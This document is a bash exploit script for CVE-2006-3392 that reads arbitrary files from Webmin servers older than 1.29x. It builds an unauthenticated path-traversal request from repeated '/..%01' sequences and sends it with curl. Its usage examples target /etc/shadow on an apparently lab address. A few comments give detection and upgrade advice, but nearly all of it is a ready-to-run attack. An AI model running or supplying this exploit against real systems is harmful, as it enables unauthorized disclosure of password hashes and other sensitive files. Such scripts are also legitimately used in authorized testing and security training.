CVE-2006-3392.sh
#!/bin/bash
# CVE-2006-3392
# Exploit Webmin < 1.29x
# Arbitrary File Disclosure
# SIGINT handling: on Ctrl+C, put the default INT disposition back and then
# re-send INT to this shell ($$), so the script is terminated by the signal
# itself instead of continuing with the next command.
reraise_sigint() {
  trap - INT # restore default INT handler
  kill -s INT "$$"
}
trap reraise_sigint INT
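# Argument handling ----------------------------------------------------
# Positional parameters:
#   $1  target IPv4 address (dotted quad)
#   $2  TCP port, integer 1-65535
#   $3  scheme, http or https (case-insensitive)
#   $4  path of the file to request
# On success this section leaves PORT and PROTOCOL set for the request code
# that follows. On any validation failure it prints the reason to stderr and
# exits with status 1, so a caller can tell a rejected invocation from a
# completed one.
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ]; then
  # No target, -h or --help: print usage and examples, then stop.
  echo ""
  echo "OsbornePro CVE-2006-3392 1.0 ( https://roberthosborne.com )"
  echo ""
  echo "USAGE: ./CVE-2006-3392.sh <target_ip> <port> http|https <path_to_file>"
  echo ""
  echo "OPTIONS:"
  echo " -h : Displays the help information for the command."
  echo ""
  echo "EXAMPLES:"
  echo " ./CVE-2006-3392.sh 10.10.10.141 80 http /etc/shadow"
  echo " # This example reads /etc/shadow from the target 10.10.10.141"
  echo ""
  echo " ./CVE-2006-3392.sh 10.10.10.141 443 https /etc/shadow"
  echo " # This example reads /etc/shadow from the target 10.10.10.141 using HTTPS"
  echo ""
  exit 0
fi

# Parameter 1: must look like a dotted quad, and every octet must be 0-255
# (the shape check alone would accept values such as 999.1.1.1).
if ! [[ "$1" =~ ^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$ ]]; then
  echo "Valid IP address was not defined. For more help use the -h option" >&2
  echo "" >&2
  exit 1
fi
for octet in "${BASH_REMATCH[@]:1}"; do
  # 10# forces base 10 so an octet written as 010 is not parsed as octal.
  if (( 10#$octet > 255 )); then
    echo "Valid IP address was not defined. For more help use the -h option" >&2
    echo "" >&2
    exit 1
  fi
done

# Exactly four positional parameters are expected. A missing port, scheme or
# file path is rejected here instead of reaching the request code.
if [ "$#" -gt 4 ]; then
  echo "Too many positional parameters have been defined. Execute './CVE-2006-3392.sh -h' for help" >&2
  echo "" >&2
  exit 1
elif [ "$#" -lt 4 ]; then
  echo "Too few positional parameters have been defined. Execute './CVE-2006-3392.sh -h' for help" >&2
  echo "" >&2
  exit 1
fi

# Parameter 2: an integer between 1 and 65535, both ends included. The digit
# check runs first so a non-numeric value never reaches the arithmetic test,
# and the five-digit cap keeps the value well inside the shell's integer range.
if [[ "$2" =~ ^[0-9]{1,5}$ ]] && (( 10#$2 >= 1 && 10#$2 <= 65535 )); then
  PORT=$(( 10#$2 )) # normalised: leading zeros dropped
else
  echo "The port you defined needs to be an integer between 1 and 65535" >&2
  echo "" >&2
  exit 1
fi

# Parameter 3: http or https, compared after lower-casing.
PROTOCOL=$(tr "[:upper:]" "[:lower:]" <<< "$3")
if [ "$PROTOCOL" != "http" ] && [ "$PROTOCOL" != "https" ]; then
  echo "Third parameter needs to be http or https" >&2
  echo "" >&2
  exit 1
fi

# If the file does not exist on the target, the server is expected to answer
# with a 404. curl is run without --fail, so it still prints that error body
# and exits 0; an HTTP-level failure is not visible in the exit status.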
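# Request construction and dispatch --------------------------------------
# Reads PROTOCOL and PORT (set by the argument handling above) plus $1
# (target address) and $4 (file path). The response body goes to stdout, the
# requested URL to stderr, and the script exits with curl's status.
#
# The request path is the literal "unauthenticated" followed by 40 copies of
# "/..%01" and then the file path from $4. The file header ties this to
# CVE-2006-3392, an arbitrary file disclosure in Webmin < 1.29x.
# Defender's view: a request line containing runs of "/..%01" under
# /unauthenticated is the pattern to search for in the Webmin / reverse-proxy
# access logs, and remediation is upgrading to a release newer than the
# affected range (confirm the exact fixed version in the vendor advisory).
REPEAT='/..%01'
PAYLOAD=''
for ((i = 0; i < 40; i++)); do
  PAYLOAD+=$REPEAT
done
URI="unauthenticated${PAYLOAD}"
URL="${PROTOCOL}://${1}:${PORT}/${URI}${4}"

case "$PROTOCOL" in
  https)
    # NOTE(review): -k disables TLS certificate verification, so the peer's
    # identity is not checked and the response is unauthenticated at the TLS
    # layer. Presumably used because such hosts serve self-signed certificates.
    curl -k -sL "$URL" -m 10
    status=$?
    ;;
  http)
    curl -sL "$URL" -m 10
    status=$?
    ;;
  *)
    printf "I don't know what you did. Whatever it was was just wrong :)\n" >&2
    exit 1
    ;;
esac

# The URL is reported on stderr for both schemes so stdout carries only the
# server's response and can be redirected to a file cleanly.
echo "${URL}" >&2
exit "$status"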